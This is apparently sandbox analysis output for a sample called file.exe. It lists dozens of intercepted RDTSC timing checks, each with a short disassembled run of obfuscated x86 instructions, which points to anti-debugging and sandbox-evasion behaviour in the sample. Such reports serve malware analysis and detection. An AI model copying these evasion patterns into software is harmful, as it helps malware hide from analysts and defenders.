              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92765B second address: 927668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FD979248A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937623 second address: 93762D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93762D second address: 937659 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD979248A7Ch 0x00000008 jbe 00007FD979248A76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FD979248A81h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937659 second address: 93765E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93765E second address: 937683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FD979248A78h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937683 second address: 937688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937688 second address: 93768E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C54D second address: 93C577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FD978BA9B16h 0x0000000b jne 00007FD978BA9B16h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 jmp 00007FD978BA9B1Bh 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jnp 00007FD978BA9B1Eh 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7BE1 second address: 8D7BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C813 second address: 93C82A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jc 00007FD978BA9B28h 0x0000000f jne 00007FD978BA9B22h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CDA9 second address: 93CDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CDAF second address: 93CDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jns 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF0B second address: 93CF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF0F second address: 93CF1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CF1B second address: 93CF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD979248A76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF45B second address: 8CF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FD978BA9B22h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94056C second address: 940574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940574 second address: 940596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B23h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007FD978BA9B1Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940596 second address: 9405AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD979248A7Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E436 second address: 90E43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E583 second address: 90E589 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E947 second address: 75F7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD978BA9B23h 0x00000008 jbe 00007FD978BA9B16h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push dword ptr [ebp+122D01C9h] 0x0000001a mov dword ptr [ebp+122D184Bh], ebx 0x00000020 call dword ptr [ebp+122D2CC3h] 0x00000026 pushad 0x00000027 xor dword ptr [ebp+122D1853h], ecx 0x0000002d xor eax, eax 0x0000002f jns 00007FD978BA9B1Eh 0x00000035 mov dword ptr [ebp+122D199Fh], esi 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 mov ch, dh 0x00000042 stc 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D3405h], eax 0x0000004a or dword ptr [ebp+122D199Fh], edx 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a or dword ptr [ebp+122D199Fh], edx 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D1863h], eax 0x00000068 ja 00007FD978BA9B2Ch 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jl 00007FD978BA9B22h 0x00000078 jnl 00007FD978BA9B1Ch 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jl 00007FD978BA9B1Ch 0x00000088 sub dword ptr [ebp+122D18A4h], ecx 0x0000008e nop 0x0000008f pushad 0x00000090 jmp 00007FD978BA9B24h 0x00000095 jmp 00007FD978BA9B23h 0x0000009a popad 0x0000009b push eax 0x0000009c jns 00007FD978BA9B28h 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 jng 00007FD978BA9B16h 0x000000aa rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EA0F second address: 90EA49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD979248A89h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD979248A88h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAD8 second address: 90EAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD978BA9B16h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007FD978BA9B32h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAEE second address: 90EAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EAF2 second address: 90EB27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FD978BA9B1Ah 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC16 second address: 90EC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC99 second address: 90EC9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EC9F second address: 90ECA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90ECA5 second address: 90ECCA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push esi 0x0000000e mov dword ptr [ebp+122D1803h], esi 0x00000014 pop edx 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD978BA9B1Ch 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F669 second address: 90F66F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F75C second address: 90F76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD978BA9B1Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F76D second address: 90F771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F771 second address: 90F7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD978BA9B18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jno 00007FD978BA9B1Bh 0x0000002b lea eax, dword ptr [ebp+12482226h] 0x00000031 mov edx, ebx 0x00000033 nop 0x00000034 pushad 0x00000035 push ebx 0x00000036 jmp 00007FD978BA9B21h 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FD978BA9B20h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F7D9 second address: 90F7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F7DD second address: 90F81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 popad 0x00000014 nop 0x00000015 lea eax, dword ptr [ebp+124821E2h] 0x0000001b and cx, E368h 0x00000020 nop 0x00000021 jmp 00007FD978BA9B28h 0x00000026 push eax 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F81C second address: 8F7C1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2A3Ch] 0x0000000e call dword ptr [ebp+122D2211h] 0x00000014 pushad 0x00000015 push esi 0x00000016 jnp 00007FD979248A76h 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C1B second address: 8F7C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C1F second address: 8F7C2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD979248A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7C2D second address: 8F7C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C354A second address: 8C354E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C354E second address: 8C355A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD978BA9B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9408A8 second address: 9408C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD979248A7Bh 0x0000000c jnp 00007FD979248A76h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940A68 second address: 940A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD978BA9B28h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940BDE second address: 940C1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979248A76h 0x00000008 jmp 00007FD979248A7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FD979248A7Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD979248A88h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940E9B second address: 940E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940E9F second address: 940EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A85h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941069 second address: 941081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B24h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941081 second address: 941099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A82h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BD1B second address: 94BD25 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BD25 second address: 94BD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A82h 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2AB5 second address: 8D2ABB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A9F2 second address: 94A9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB30 second address: 94AB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD978BA9B1Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB45 second address: 94AB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB49 second address: 94AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB4F second address: 94AB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD979248A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94AB67 second address: 94AB6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A697 second address: 94A69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A69D second address: 94A6CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FD978BA9B3Eh 0x00000012 jmp 00007FD978BA9B24h 0x00000017 pushad 0x00000018 jbe 00007FD978BA9B16h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B424 second address: 94B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B42A second address: 94B453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD978BA9B22h 0x0000000a push edi 0x0000000b jc 00007FD978BA9B16h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD978BA9B16h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B453 second address: 94B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B5C6 second address: 94B5E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B5E2 second address: 94B5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A81h 0x00000007 push edx 0x00000008 jnp 00007FD979248A76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95157D second address: 951581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951581 second address: 951589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951589 second address: 9515AF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD978BA9B30h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9501BE second address: 9501CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950418 second address: 950438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007FD978BA9B18h 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AC6 second address: 950AD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AD8 second address: 950ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950ADD second address: 950AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950AE5 second address: 950AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950C37 second address: 950C57 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD979248A86h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954729 second address: 954753 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 ja 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FD978BA9B16h 0x00000018 jmp 00007FD978BA9B22h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954753 second address: 95477C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD979248A78h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FD979248A76h 0x00000017 jmp 00007FD979248A82h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95477C second address: 954780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9567F7 second address: 9567FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9567FE second address: 956803 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956803 second address: 956844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD979248A88h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FD979248AA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD979248A84h 0x00000019 ja 00007FD979248A76h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95699B second address: 95699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95699F second address: 9569AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD979248A7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569AD second address: 9569E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FD978BA9B24h 0x0000000a jl 00007FD978BA9B16h 0x00000010 pop eax 0x00000011 popad 0x00000012 jng 00007FD978BA9B28h 0x00000018 jl 00007FD978BA9B22h 0x0000001e jp 00007FD978BA9B16h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959C8A second address: 959C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959C8E second address: 959CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FD978BA9B1Eh 0x0000000e jo 00007FD978BA9B16h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FD978BA9B18h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FD978BA9B28h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959572 second address: 959576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959576 second address: 95957C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
